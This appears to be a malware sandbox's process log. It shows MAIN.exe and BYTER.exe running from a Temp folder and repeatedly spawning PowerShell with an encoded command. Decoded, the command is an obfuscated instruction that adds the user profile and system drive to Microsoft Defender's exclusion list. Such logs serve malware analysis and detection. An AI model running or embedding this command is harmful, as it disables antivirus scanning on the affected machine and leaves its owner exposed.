C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
